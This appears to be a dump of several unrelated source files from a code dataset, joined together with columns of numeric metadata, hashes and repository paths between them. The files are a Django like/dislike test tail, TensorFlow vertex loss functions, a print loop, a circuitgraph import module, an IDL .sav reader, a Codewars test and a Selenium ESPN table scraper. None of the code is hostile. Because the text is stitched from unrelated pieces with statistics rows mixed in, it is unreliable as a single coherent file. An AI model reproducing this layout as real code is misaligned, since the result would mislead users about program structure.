        response = self._send_dislike_update(auth_headers)
        self.assertEqual(response.status_code, 200)

    def test_can_update_like_on_un_liked_article(self):
        """ test a user can like any article with a dislike"""
        # Updating a like that was never created fails with 400.
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        response = self._send_dislike_update(auth_headers)
        self.assertEqual(response.status_code, 400)

    def test_can_update_like_on_un_known_article(self):
        """ test a user can like any article with a dislike"""
        # Updating a like on a non-existent article fails with 400.
        auth_headers = self.user_logged_in
        response = self._send_dislike_update(auth_headers, article_id=10000)
        self.assertEqual(response.status_code, 400)

    def test_can_delete_like(self):
        """ test a user can delete an like on an article"""
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        self._send_like(auth_headers)
        response = self._send_like_delete(auth_headers)
        self.assertEqual(response.status_code, 200)

    def test_can_delete_like_on_unliked_article(self):
        """ test a user can delete an like on any article"""
        # Deleting a like that was never created fails with 400.
        auth_headers = self.user_logged_in
        self._create_article(auth_headers)
        response = self._send_like_delete(auth_headers)
        self.assertEqual(response.status_code, 400)

    def test_can_delete_like_on_un_known_article(self):
        """ test a user can delete an like on an unknown article"""
        auth_headers = self.user_logged_in
        response = self._send_like_delete(auth_headers, article_id=1000)
        self.assertEqual(response.status_code, 400)
| 37.067358
| 88
| 0.64775
| 945
| 7,154
| 4.679365
| 0.077249
| 0.084577
| 0.072818
| 0.135233
| 0.946404
| 0.946404
| 0.930122
| 0.922433
| 0.906151
| 0.892809
| 0
| 0.01093
| 0.245457
| 7,154
| 192
| 89
| 37.260417
| 0.808262
| 0.155018
| 0
| 0.809524
| 0
| 0
| 0.14159
| 0.053222
| 0
| 0
| 0
| 0
| 0.114286
| 1
| 0.104762
| false
| 0
| 0.009524
| 0
| 0.12381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57ea01307112c075c0d03cecad8911ba88fd1fd6
| 11,159
|
py
|
Python
|
dnn_reco/modules/loss/track_loss.py
|
The-Ludwig/dnn_reco
|
a17e2cc97c4bb4912414997f2e79149b68c10e3f
|
[
"MIT"
] | 1
|
2021-05-06T10:00:51.000Z
|
2021-05-06T10:00:51.000Z
|
dnn_reco/modules/loss/track_loss.py
|
The-Ludwig/dnn_reco
|
a17e2cc97c4bb4912414997f2e79149b68c10e3f
|
[
"MIT"
] | 2
|
2021-12-07T15:23:57.000Z
|
2021-12-10T15:44:17.000Z
|
dnn_reco/modules/loss/track_loss.py
|
The-Ludwig/dnn_reco
|
a17e2cc97c4bb4912414997f2e79149b68c10e3f
|
[
"MIT"
] | 1
|
2022-02-07T16:20:10.000Z
|
2022-02-07T16:20:10.000Z
|
from __future__ import division, print_function
import tensorflow as tf
import numpy as np
from dnn_reco import misc
from dnn_reco.modules.loss.utils import loss_utils
"""
All defined models must have the following signature:
Parameters
----------
config : dict
Dictionary containing all settings as read in from config file.
data_handler : :obj: of class DataHandler
An instance of the DataHandler class. The object is used to obtain
meta data.
data_transformer : :obj: of class DataTransformer
An instance of the DataTransformer class. The object is used to
transform data.
shared_objects : dict
A dictionary containg settings and objects that are shared and passed
on to sub modules.
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
Returns
-------
tf.Tensor
A tensorflow tensor containing the loss for each label.
A weighted sum with weights as defined in the config will be performed
over these loss terms to obtain a scalar loss.
Shape: label_shape (same shape as labels)
"""
def track_pos_mse(config, data_handler, data_transformer, shared_objects,
                  *args, **kwargs):
    """The MSE of the 4-vector distance of the predicted vertex (x, y, z, t)
    and the infinite track given by the true direction.

    The label is set up such that all points on the infinite track are correct
    predictions. This loss only applies to vertex (x, y, z, t) via the labels
    'pos_x', 'pos_y', 'pos_z', 'time' as defined in the label_particle_keys.

    Parameters
    ----------
    config : dict
        Dictionary containing all settings as read in from config file.
    data_handler : :obj: of class DataHandler
        An instance of the DataHandler class. The object is used to obtain
        meta data.
    data_transformer : :obj: of class DataTransformer
        An instance of the DataTransformer class. The object is used to
        transform data.  (Unused here, but part of the loss-module
        signature contract described in the module docstring.)
    shared_objects : dict
        A dictionary containing settings and objects that are shared and
        passed on to sub modules.  Must provide 'y_true', 'y_pred' and
        'y_unc' tensors; may provide per-event 'event_weights'.
    *args
        Variable length argument list.
    **kwargs
        Arbitrary keyword arguments.

    Returns
    -------
    tf.Tensor
        A tensorflow tensor containing the loss for each label.
        Shape: label_shape (same shape as labels)
    """
    # Column indices of the true direction unit vector and of the vertex
    # 4-vector inside the label tensors.
    index_dir_x = data_handler.get_label_index(config['label_dir_x_key'])
    index_dir_y = data_handler.get_label_index(config['label_dir_y_key'])
    index_dir_z = data_handler.get_label_index(config['label_dir_z_key'])
    index_pos_x = data_handler.get_label_index(
        config['label_particle_keys']['pos_x'])
    index_pos_y = data_handler.get_label_index(
        config['label_particle_keys']['pos_y'])
    index_pos_z = data_handler.get_label_index(
        config['label_particle_keys']['pos_z'])
    index_time = data_handler.get_label_index(
        config['label_particle_keys']['time'])
    dir_x_true = shared_objects['y_true'][:, index_dir_x]
    dir_y_true = shared_objects['y_true'][:, index_dir_y]
    dir_z_true = shared_objects['y_true'][:, index_dir_z]
    x_true = shared_objects['y_true'][:, index_pos_x]
    y_true = shared_objects['y_true'][:, index_pos_y]
    z_true = shared_objects['y_true'][:, index_pos_z]
    time_true = shared_objects['y_true'][:, index_time]
    x_pred = shared_objects['y_pred'][:, index_pos_x]
    y_pred = shared_objects['y_pred'][:, index_pos_y]
    z_pred = shared_objects['y_pred'][:, index_pos_z]
    time_pred = shared_objects['y_pred'][:, index_time]
    x_unc = shared_objects['y_unc'][:, index_pos_x]
    y_unc = shared_objects['y_unc'][:, index_pos_y]
    z_unc = shared_objects['y_unc'][:, index_pos_z]
    time_unc = shared_objects['y_unc'][:, index_time]
    # x: predicted point, p: true point on track, d: true unit direction vector
    # calculate a = x - p
    a1 = x_pred - x_true
    a2 = y_pred - y_true
    a3 = z_pred - z_true
    # scalar product s = a*d, s is distance to closest point on infinite track
    s = a1*dir_x_true + a2*dir_y_true + a3*dir_z_true
    # calculate r = s*d - a = (p + s*d) - x
    # (the displacement of the prediction from the closest track point)
    r1 = s*dir_x_true - a1
    r2 = s*dir_y_true - a2
    r3 = s*dir_z_true - a3
    # calculate time diff [meter] at closest approach point on infinite track
    c = 0.299792458  # speed of light in m/ns
    rt = (time_true + (s / c) - time_pred) * c
    # The uncertainty outputs are trained to predict the residual magnitudes;
    # tf.stop_gradient prevents these terms from back-propagating into the
    # position/time predictions themselves.
    unc_diff_x = tf.stop_gradient(r1) - x_unc
    unc_diff_y = tf.stop_gradient(r2) - y_unc
    unc_diff_z = tf.stop_gradient(r3) - z_unc
    unc_diff_t = tf.stop_gradient(rt) - time_unc
    if 'event_weights' in shared_objects:
        # Weighted mean over the batch (axis 0) using the per-event weights.
        weights = shared_objects['event_weights']
        w_sum = tf.reduce_sum(input_tensor=weights, axis=0)
        loss_x = tf.reduce_sum(input_tensor=(r1**2 + unc_diff_x**2) * weights, axis=0) / w_sum
        loss_y = tf.reduce_sum(input_tensor=(r2**2 + unc_diff_y**2) * weights, axis=0) / w_sum
        loss_z = tf.reduce_sum(input_tensor=(r3**2 + unc_diff_z**2) * weights, axis=0) / w_sum
        loss_t = tf.reduce_sum(input_tensor=(rt**2 + unc_diff_t**2) * weights, axis=0) / w_sum
    else:
        loss_x = tf.reduce_mean(input_tensor=r1**2 + unc_diff_x**2, axis=0)
        loss_y = tf.reduce_mean(input_tensor=r2**2 + unc_diff_y**2, axis=0)
        loss_z = tf.reduce_mean(input_tensor=r3**2 + unc_diff_z**2, axis=0)
        loss_t = tf.reduce_mean(input_tensor=rt**2 + unc_diff_t**2, axis=0)
    # Labels other than the four vertex components contribute zero loss.
    zeros = tf.zeros_like(loss_x)
    loss_all_list = []
    for label in data_handler.label_names:
        if label == config['label_particle_keys']['pos_x']:
            loss_all_list.append(loss_x)
        elif label == config['label_particle_keys']['pos_y']:
            loss_all_list.append(loss_y)
        elif label == config['label_particle_keys']['pos_z']:
            loss_all_list.append(loss_z)
        elif label == config['label_particle_keys']['time']:
            loss_all_list.append(loss_t)
        else:
            loss_all_list.append(zeros)
    loss_all = tf.stack(loss_all_list, axis=0)
    loss_utils.add_logging_info(data_handler, shared_objects)
    return loss_all
def track_pos_gaussian(config, data_handler, data_transformer, shared_objects,
                       *args, **kwargs):
    """The Gaussian Likelihood loss of the 4-vector distance of the predicted
    vertex (x, y, z, t) and the infinite track given by the true direction.

    The label is set up such that all points on the infinite track are correct
    predictions. This loss only applies to vertex (x, y, z, t) via the labels
    'pos_x', 'pos_y', 'pos_z', 'time' as defined in the label_particle_keys.

    Parameters
    ----------
    config : dict
        Dictionary containing all settings as read in from config file.
    data_handler : :obj: of class DataHandler
        An instance of the DataHandler class. The object is used to obtain
        meta data.
    data_transformer : :obj: of class DataTransformer
        An instance of the DataTransformer class. The object is used to
        transform data.  (Unused here, but part of the loss-module
        signature contract.)
    shared_objects : dict
        A dictionary containing settings and objects that are shared and
        passed on to sub modules.  Must provide 'y_true', 'y_pred' and
        'y_unc'; may provide per-event 'event_weights'.
    *args
        Variable length argument list.
    **kwargs
        Arbitrary keyword arguments.

    Returns
    -------
    tf.Tensor
        A tensorflow tensor containing the loss for each label.
        Shape: label_shape (same shape as labels)
    """
    get_index = data_handler.get_label_index
    particle_keys = config['label_particle_keys']

    # Column indices: true direction unit vector, vertex position, time.
    idx_dir = [get_index(config[key]) for key in
               ('label_dir_x_key', 'label_dir_y_key', 'label_dir_z_key')]
    idx_pos = [get_index(particle_keys[key]) for key in
               ('pos_x', 'pos_y', 'pos_z')]
    idx_time = get_index(particle_keys['time'])

    y_true = shared_objects['y_true']
    y_pred = shared_objects['y_pred']
    y_unc = shared_objects['y_unc']

    d1, d2, d3 = (y_true[:, i] for i in idx_dir)
    p1, p2, p3 = (y_true[:, i] for i in idx_pos)
    t_true = y_true[:, idx_time]
    q1, q2, q3 = (y_pred[:, i] for i in idx_pos)
    t_pred = y_pred[:, idx_time]
    u1, u2, u3 = (y_unc[:, i] for i in idx_pos)
    t_unc = y_unc[:, idx_time]

    # Offset from true vertex p to predicted vertex x: a = x - p.
    a1 = q1 - p1
    a2 = q2 - p2
    a3 = q3 - p3
    # Signed distance s = a*d along the true direction to the closest
    # point on the infinite track.
    s = a1*d1 + a2*d2 + a3*d3
    # Residual r = s*d - a = (p + s*d) - x.
    r1 = s*d1 - a1
    r2 = s*d2 - a2
    r3 = s*d3 - a3
    # Time residual at the closest approach point, expressed in meters.
    c = 0.299792458  # in m /ns
    rt = (t_true + (s / c) - t_pred) * c

    # Gaussian negative log-likelihood terms (constants dropped).
    gl_terms = {
        'pos_x': 2*tf.math.log(u1) + (r1 / u1)**2,
        'pos_y': 2*tf.math.log(u2) + (r2 / u2)**2,
        'pos_z': 2*tf.math.log(u3) + (r3 / u3)**2,
        'time': 2*tf.math.log(t_unc) + (rt / t_unc)**2,
    }

    if 'event_weights' in shared_objects:
        weights = shared_objects['event_weights']
        w_sum = tf.reduce_sum(input_tensor=weights, axis=0)
        losses = {key: tf.reduce_sum(input_tensor=term * weights,
                                     axis=0) / w_sum
                  for key, term in gl_terms.items()}
    else:
        losses = {key: tf.reduce_mean(input_tensor=term, axis=0)
                  for key, term in gl_terms.items()}

    # Labels other than the four vertex components contribute zero loss.
    zeros = tf.zeros_like(losses['pos_x'])
    # Insert in reverse priority so that, should two particle keys ever map
    # to the same label name, pos_x wins over pos_y over pos_z over time --
    # the same precedence as an if/elif chain.
    label_to_loss = {}
    for key in ('time', 'pos_z', 'pos_y', 'pos_x'):
        label_to_loss[particle_keys[key]] = losses[key]
    loss_all = tf.stack([label_to_loss.get(label, zeros)
                         for label in data_handler.label_names], axis=0)

    loss_utils.add_logging_info(data_handler, shared_objects)
    return loss_all
| 37.827119
| 94
| 0.667623
| 1,748
| 11,159
| 3.953089
| 0.101831
| 0.077135
| 0.060781
| 0.053256
| 0.919247
| 0.919247
| 0.916932
| 0.912301
| 0.898408
| 0.869754
| 0
| 0.011811
| 0.226096
| 11,159
| 294
| 95
| 37.955782
| 0.788328
| 0.241061
| 0
| 0.783217
| 0
| 0
| 0.095883
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013986
| false
| 0
| 0.034965
| 0
| 0.062937
| 0.006993
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
17f7f752854eeb49405829e640f48cf138a6d0c9
| 53
|
py
|
Python
|
test3a.py
|
jonloga/pynetc
|
e4a2d533de920d6e6c5bb6b5e09699992ba796d2
|
[
"Apache-2.0"
] | null | null | null |
test3a.py
|
jonloga/pynetc
|
e4a2d533de920d6e6c5bb6b5e09699992ba796d2
|
[
"Apache-2.0"
] | null | null | null |
test3a.py
|
jonloga/pynetc
|
e4a2d533de920d6e6c5bb6b5e09699992ba796d2
|
[
"Apache-2.0"
] | null | null | null |
# Print the integers 0 through 9, one per line.
for x in range(10):
    print(x)

# In Python the loop variable outlives the loop, so each of these prints
# the final value (9) once more.
print(x)

print(x)
| 7.571429
| 19
| 0.584906
| 11
| 53
| 2.818182
| 0.545455
| 0.580645
| 0.709677
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.245283
| 53
| 6
| 20
| 8.833333
| 0.725
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
aa385f23aebfb544eecb71572cfdec93f13081a3
| 130
|
py
|
Python
|
circuitgraph/parsing/__init__.py
|
ncasti/circuitgraph
|
9fe129d6ba64b4254d2d27d16ae69b7dce5ce957
|
[
"MIT"
] | 35
|
2020-07-17T21:02:31.000Z
|
2022-03-22T20:48:30.000Z
|
circuitgraph/parsing/__init__.py
|
ncasti/circuitgraph
|
9fe129d6ba64b4254d2d27d16ae69b7dce5ce957
|
[
"MIT"
] | 23
|
2020-07-30T17:58:33.000Z
|
2021-09-24T16:41:34.000Z
|
circuitgraph/parsing/__init__.py
|
ncasti/circuitgraph
|
9fe129d6ba64b4254d2d27d16ae69b7dce5ce957
|
[
"MIT"
] | 6
|
2020-07-31T18:27:14.000Z
|
2021-11-11T19:32:47.000Z
|
"""
Utilities for parsing netlists
"""
from circuitgraph.parsing.verilog import *
from circuitgraph.parsing.fast_verilog import *
| 21.666667
| 47
| 0.8
| 15
| 130
| 6.866667
| 0.6
| 0.31068
| 0.446602
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107692
| 130
| 5
| 48
| 26
| 0.887931
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a4c6ed8f8fb8d176ba8299b9bf972f72cebc5628
| 6,754
|
py
|
Python
|
pyuvis/idlsav.py
|
spacemanjosh/pyuvis
|
55c4942c61c8a152bbb7d199be719a7ad2dd0b8a
|
[
"BSD-2-Clause"
] | 1
|
2020-04-16T17:25:28.000Z
|
2020-04-16T17:25:28.000Z
|
pyuvis/idlsav.py
|
spacemanjosh/pyuvis
|
55c4942c61c8a152bbb7d199be719a7ad2dd0b8a
|
[
"BSD-2-Clause"
] | 5
|
2020-11-06T19:12:17.000Z
|
2021-11-12T17:20:51.000Z
|
pyuvis/idlsav.py
|
michaelaye/pyuvis
|
904b64a5cc306f3b724ca445b8d1fd2cc5d1ec0c
|
[
"BSD-2-Clause"
] | 2
|
2019-02-24T15:47:10.000Z
|
2020-06-09T06:00:09.000Z
|
# AUTOGENERATED! DO NOT EDIT! File to edit: notebooks/02_idlsav.ipynb (unless otherwise specified).
__all__ = ['check_kernels', 'swap_cell', 'read_idlsav_file', 'SavConverter']
# Cell
from scipy.io import readsav
import pandas as pd
import numpy as np
# Cell
def check_kernels(cell):
    """Return NaN if *cell* holds only empty strings, else return *cell*.

    Used when cleaning the KERNELS column: a cell consisting solely of
    empty strings carries no data and is flagged as NaN so it can be
    detected/dropped downstream.

    Parameters
    ----------
    cell : numpy.ndarray
        Array of strings from one DataFrame cell.

    Returns
    -------
    float or numpy.ndarray
        ``np.nan`` when the cell is all empty strings, otherwise the
        unmodified cell.
    """
    # np.unique collapses the cell to its distinct values; compare against
    # a single empty string.  Fix: np.NAN was removed in NumPy 2.0 -- the
    # canonical spelling is np.nan.
    if all(np.unique(cell) == np.array([''])):
        return np.nan
    return cell
# Cell
def swap_cell(cell):
    """Return *cell* byte-swapped with its dtype byte order flipped.

    The two operations cancel numerically: values are unchanged, but the
    array is re-described in the opposite byte order (used to convert
    big-endian IDL data to the machine's native order).

    Parameters
    ----------
    cell : numpy.ndarray
        Array stored in one DataFrame cell.

    Returns
    -------
    numpy.ndarray
        View of the swapped data with the flipped-byte-order dtype.
    """
    # Fix: ndarray.newbyteorder() was removed in NumPy 2.0; viewing the
    # swapped bytes through a byte-order-flipped dtype is the supported
    # equivalent and produces the same result.
    return cell.byteswap().view(cell.dtype.newbyteorder())
# Cell
def read_idlsav_file(filename):
    """Read an IDL .sav file and return its largest substructure as a
    DataFrame.

    Scans all top-level entries of the .sav file, picks the one with the
    greatest ``len()``, converts it to a DataFrame, and byte-swaps the
    non-object columns from IDL's (big-endian) byte order to the native
    one.  Progress is reported via ``print``.

    Parameters
    ----------
    filename : str
        Path to the IDL .sav file.

    Returns
    -------
    pandas.DataFrame
        The largest substructure, partially converted to native byte order.
    """
    tmp = readsav(filename)
    # find largest substructure and return that
    key_of_longest = ''
    longestlength = 0
    print("Searching for longest substructure and returning that.")
    for thiskey in tmp.keys():
        try:
            thislength = len(tmp[thiskey])
        except TypeError:
            # Scalars and other length-less entries are skipped.
            print("Item with key '{}' has no length. Skipping."
                  .format(thiskey))
            continue
        print("Found '{}'' with length {}.".format(thiskey, thislength))
        if thislength > longestlength:
            key_of_longest = thiskey
            longestlength = thislength
    print("Return substructure with name '{}'.".format(key_of_longest))
    df = pd.DataFrame.from_records(tmp[key_of_longest])
    #print df.dtypes.values
    # There is a problem here. You see all these '>f8' datatypes in there?
    # This means that at least those parts of the IDL data structure is in the
    # inverse byte-ordering way than today's modern PC use, horrible!!
    # One needs to convert this, otherwise all the numbers can't be trusted.
    # print df.head()
    #print df.UVIS[0]
    # This looks like each cell has a 2D numpy array:
    # print df.UVIS[0].shape
    # print df.columns.values
    # Ok, let's change the columns that can be changed easily, i.e. the columns
    # that don't have arrays in each cell:
    df = df.apply(lambda x: x.values.byteswap().newbyteorder()
                  if x.dtype != 'O' else x)
    ## print df.dtypes.values
    # As you can see, the float dtypes are now pointing to the left ('<f8')
    # which means they are little-endian, as any normal computer is these days.
    # Now, let's put a proper index, `time` for instance:
    #df.index = pd.DatetimeIndex(df.UTC)
    ## print df.drop('UTC', axis=1, inplace=True)
    ## print df.index
    # Now, swap the bytes for each array in each DataFrame cell
    # first loop over columns, and then each column gets the lambda converter
    # func from above.
    # NOTE(review): this guard selects NON-object columns, but the comment
    # above says the per-cell arrays live in object ('O') columns, and the
    # apply() above already swapped the non-object columns -- the condition
    # may be inverted (should it be `== np.dtype('O')`?).  Confirm before
    # changing; behavior kept byte-identical here.
    for col in df.columns:
        if df[col].dtype != np.dtype('O'):
            try:
                df[col] = df[col].map(swap_cell)
            except TypeError:
                print(col, 'typeerror')
    #print df.UVIS.iloc[0].dtype
    #print df.dtypes.values
    # TODO: put this stuff later in o clean-up function
    # success!!
    # Now let's see if the KERNELS column actually ever has data:
    # df.KERNELS = df.KERNELS.map(check_kernels)
    ## print 'wtf', df.KERNELS.notnull().value_counts()
    # This means that no KERNEL data was included, so we can drop it:
    # print df.drop('KERNELS', axis=1, inplace=True)
    # first only look at easy columns where there isn't an array per cell:
    # dtypecheck = df.dtypes != 'O'
    # easy_cols = dtypecheck[dtypecheck is True].index
    # note you can scroll the table to the right, but if it's wider or longer
    # than a certain number (settable) than it's truncated
    #print df[easy_cols]
    # Now it's your turn! ;)
    return df
# Cell
class SavConverter:
    """Load an IDL .sav file and expose its largest substructure as ``df``.

    Work-in-progress class port of :func:`read_idlsav_file`: the loading
    step is implemented, while the byte-swapping clean-up steps are still
    present only as commented-out code below.
    """

    def __init__(self, filename):
        """Read *filename* and store its largest substructure in ``self.df``.

        Progress is reported via ``print``, mirroring
        :func:`read_idlsav_file`.
        """
        self.fname = filename
        tmp = readsav(filename)
        # find largest substructure and return that
        key_of_longest = ''
        longestlength = 0
        print("Searching for longest substructure and returning that.")
        for thiskey in tmp.keys():
            try:
                thislength = len(tmp[thiskey])
            except TypeError:
                # Scalars and other length-less entries are skipped.
                print("Item with key '{}' has no length. Skipping."
                      .format(thiskey))
                continue
            print("Found '{}'' with length {}.".format(thiskey, thislength))
            if thislength > longestlength:
                key_of_longest = thiskey
                longestlength = thislength
        print("Return substructure with name '{}'.".format(key_of_longest))
        self.df = pd.DataFrame.from_records(tmp[key_of_longest])

    @property
    def dtypes(self):
        """numpy dtypes of the loaded DataFrame's columns."""
        return self.df.dtypes.values

    # The remainder is the not-yet-ported clean-up logic, kept verbatim:
    #print df.dtypes.values
    # There is a problem here. You see all these '>f8' datatypes in there?
    # This means that at least those parts of the IDL data structure is in the
    # inverse byte-ordering way than today's modern PC use, horrible!!
    # One needs to convert this, otherwise all the numbers can't be trusted.
    # print df.head()
    #print df.UVIS[0]
    # This looks like each cell has a 2D numpy array:
    # print df.UVIS[0].shape
    # print df.columns.values
    # Ok, let's change the columns that can be changed easily, i.e. the columns
    # that don't have arrays in each cell:
    # df = df.apply(lambda x: x.values.byteswap().newbyteorder()
    #               if x.dtype != 'O' else x)
    ## print df.dtypes.values
    # As you can see, the float dtypes are now pointing to the left ('<f8')
    # which means they are little-endian, as any normal computer is these days.
    # Now, let's put a proper index, `time` for instance:
    #df.index = pd.DatetimeIndex(df.UTC)
    ## print df.drop('UTC', axis=1, inplace=True)
    ## print df.index
    # Now, swap the bytes for each array in each DataFrame cell
    # first loop over columns, and then each column gets the lambda converter
    # func from above.
    # for col in df.columns:
    #     if df[col].dtype != np.dtype('O'):
    #         try:
    #             df[col] = df[col].map(swap_cell)
    #         except TypeError:
    #             print(col, 'typeerror')
    #print df.UVIS.iloc[0].dtype
    #print df.dtypes.values
    # TODO: put this stuff later in o clean-up function
    # success!!
    # Now let's see if the KERNELS column actually ever has data:
    # df.KERNELS = df.KERNELS.map(check_kernels)
    ## print 'wtf', df.KERNELS.notnull().value_counts()
    # This means that no KERNEL data was included, so we can drop it:
    # print df.drop('KERNELS', axis=1, inplace=True)
    # first only look at easy columns where there isn't an array per cell:
    # dtypecheck = df.dtypes != 'O'
    # easy_cols = dtypecheck[dtypecheck is True].index
    # note you can scroll the table to the right, but if it's wider or longer
    # than a certain number (settable) than it's truncated
    #print df[easy_cols]
    # Now it's your turn! ;)
    # return df
| 35.925532
| 99
| 0.633254
| 966
| 6,754
| 4.380952
| 0.233954
| 0.039698
| 0.022684
| 0.026938
| 0.899338
| 0.899338
| 0.899338
| 0.899338
| 0.899338
| 0.880907
| 0
| 0.004034
| 0.265916
| 6,754
| 188
| 100
| 35.925532
| 0.849536
| 0.578176
| 0
| 0.557377
| 1
| 0
| 0.137918
| 0
| 0
| 0
| 0
| 0.005319
| 0
| 1
| 0.081967
| false
| 0
| 0.04918
| 0.032787
| 0.229508
| 0.147541
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4f9946d6bff4472ecf9998fa01b7f5721c6d3b7
| 311
|
py
|
Python
|
Codewars/6kyu/decompose-a-number/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/6kyu/decompose-a-number/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/6kyu/decompose-a-number/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
# Codewars 6kyu "Decompose a number" test cases.  Both `test` (the assertion
# framework) and `decompose` (the solution under test) are presumably
# injected by the Codewars runner — neither is defined in this file.
# Each expected value is a pair [list_of_terms, remainder].
test.assert_equals(decompose(0), [[], 0])
test.assert_equals(decompose(4), [[2], 0])
test.assert_equals(decompose(9), [[3], 1])
test.assert_equals(decompose(25), [[4, 2], 0])
test.assert_equals(decompose(8330475), [[22, 13, 10, 8, 7, 6, 6, 5, 5, 5, 4, 4, 4, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2], 0])
| 38.875
| 117
| 0.598071
| 61
| 311
| 2.967213
| 0.327869
| 0.276243
| 0.441989
| 0.690608
| 0.629834
| 0.309392
| 0.309392
| 0
| 0
| 0
| 0
| 0.186567
| 0.138264
| 311
| 7
| 118
| 44.428571
| 0.488806
| 0.045016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3543a5b6c8b285d716d55aab946bbca092604c26
| 3,128
|
py
|
Python
|
Premier_league_web_scraping.py
|
dlam96/Premier-league-web-scraper
|
b1fb3d03d8d24eacfe02afc24598aae2dd8594ee
|
[
"Unlicense"
] | null | null | null |
Premier_league_web_scraping.py
|
dlam96/Premier-league-web-scraper
|
b1fb3d03d8d24eacfe02afc24598aae2dd8594ee
|
[
"Unlicense"
] | null | null | null |
Premier_league_web_scraping.py
|
dlam96/Premier-league-web-scraper
|
b1fb3d03d8d24eacfe02afc24598aae2dd8594ee
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8

# Scrape the current Premier League table from ESPN with Selenium and build
# a pandas DataFrame (one row per team, indexed by league position).

# In[1]:

from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
import numpy as np
import os

# In[2]:

# load url
url = "http://www.espn.co.uk/football/table/_/league/eng.1"

# create a new Firefox session
driver = webdriver.Firefox()
driver.implicitly_wait(30)
driver.get(url)

# In[3]:

# XPath templates for the league table.  The team name lives in a different
# sub-table (td[1]) than the eight numeric stat columns (td[2]), hence the
# two templates; {row} is the 1-indexed table row, {col} the stat column.
_TABLE = ('/html/body/div[1]/div/div/div/div/div[5]/div[3]/div[1]/div/'
          'section/section/section/div[1]/section/table/tbody/tr')
TEAM_XPATH = _TABLE + '/td[1]/table[1]/tbody/tr[{row}]/td/div/span[4]/a'
STAT_XPATH = (_TABLE + '/td[2]/div/div/div[2]/table/tbody/tr/td/table/'
              'tbody/tr[{row}]/td[{col}]/span')

# load data values and append to data list
datalist = []
for i in range(1, 21):  # 20 Premier League teams; table rows are 1-indexed
    # NOTE(review): find_element_by_xpath is deprecated in Selenium 4 —
    # switch to driver.find_element(By.XPATH, ...) when upgrading.
    team = driver.find_element_by_xpath(TEAM_XPATH.format(row=i)).text
    # Stat columns 1..8 are: GP, W, D, L, F, A, GD, P — in that order.
    stats = [driver.find_element_by_xpath(STAT_XPATH.format(row=i, col=col)).text
             for col in range(1, 9)]
    datalist.append([team] + stats)

driver.quit()

# In[4]:

# label columns and start row at 1
df = pd.DataFrame(datalist, columns=['Team', 'Games Played', 'Wins', 'Draw',
                                     'Losses', 'Goals Scored', 'Goals Conceeded',
                                     'Goal Difference', 'Points'])
df.index = df.index + 1
df.index.name = 'Position'

# In[5]:

df
| 44.056338
| 237
| 0.683824
| 605
| 3,128
| 3.482645
| 0.173554
| 0.159468
| 0.162316
| 0.113906
| 0.706217
| 0.706217
| 0.706217
| 0.706217
| 0.706217
| 0.706217
| 0
| 0.032963
| 0.078645
| 3,128
| 70
| 238
| 44.685714
| 0.698126
| 0.125639
| 0
| 0
| 0
| 0.384615
| 0.633358
| 0.541146
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.192308
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
